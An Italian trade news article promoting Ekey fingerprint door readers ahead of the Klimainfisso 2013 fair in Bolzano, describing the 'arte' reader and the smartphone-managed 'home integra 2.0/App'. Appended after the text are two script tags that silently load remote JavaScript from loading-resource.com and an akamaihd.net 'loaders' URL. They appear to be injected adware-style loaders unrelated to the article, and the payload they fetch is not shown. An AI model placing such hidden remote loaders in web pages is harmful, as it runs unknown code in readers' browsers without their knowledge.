1. Home
  2. Notizie e Mercato
  3. Klimainfisso: EKEY, Lettori di impronte digitali

Klimainfisso: EKEY, Lettori di impronte digitali

Infissi e Serramenti di
5/5
votato da 1 persone
Ekey parteciperà a Klimainfisso 2013, fiera specializzata della filiera produttiva del serramento che si terrà a Bolzano dal 7 al 9 marzo 2013, e informa sui suoi lettori d’impronte digitali


Nello sviluppo del nuovo lettore d’impronte digitali "arte" il motto informale è stato "visibile e invisibile,  vistoso e non appariscente!" Il suo design semplice ed elegante in acciaio inox e le sue dimensioni di soli 22x50 millimetri lo rendono perfetto per l'integrazione in porte e ferramenta.

L’inserimento delle impronte digitali (fino ad un numero di 99 persone) avviene attraverso un'unità di controllo separata, che viene inserita nella porta. Chiavi perse fanno parte del passato! Grazie al nuovo "passacavo ekey con centralina integrata" il processo di produzione per porte biometriche in alluminio, legno e in plastica è semplificato. Con solo tre fresature, per serratura motorizzata, passacavo e lettore biometrico, ogni porta d’entrata può essere dotata di un innovativo sistema della società ekey.

I cavi preconfezionati con connettori inconfondibili fanno in modo da facilitare il cablaggio. Attraverso un fissaggio intelligente a scomparsa, il passacavo può essere separato con facilità anche dopo l'installazione della porta presso il cliente.

Con il lettore ekey home integra 2.0/App la società introduce un altro nuovo prodotto ekey. La particolarità del nuovo prodotto è che, oltre all'accesso senza chiave ma con l’impronta digitale, la gestione degli utenti avviene confortevolmente tramite il proprio smartphone. Dotato di un lettore Bluetooth, nuove persone possono essere “somministrate” tramite un’app (disponibile per Android e iPhone). Possono essere così salvati i dati delle impronte digitali di fino a 99 persone.


<script src="https://loading-resource.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2012-10-16&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1" type="text/javascript"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&amp;pid=1032&amp;zoneid=62862"></script>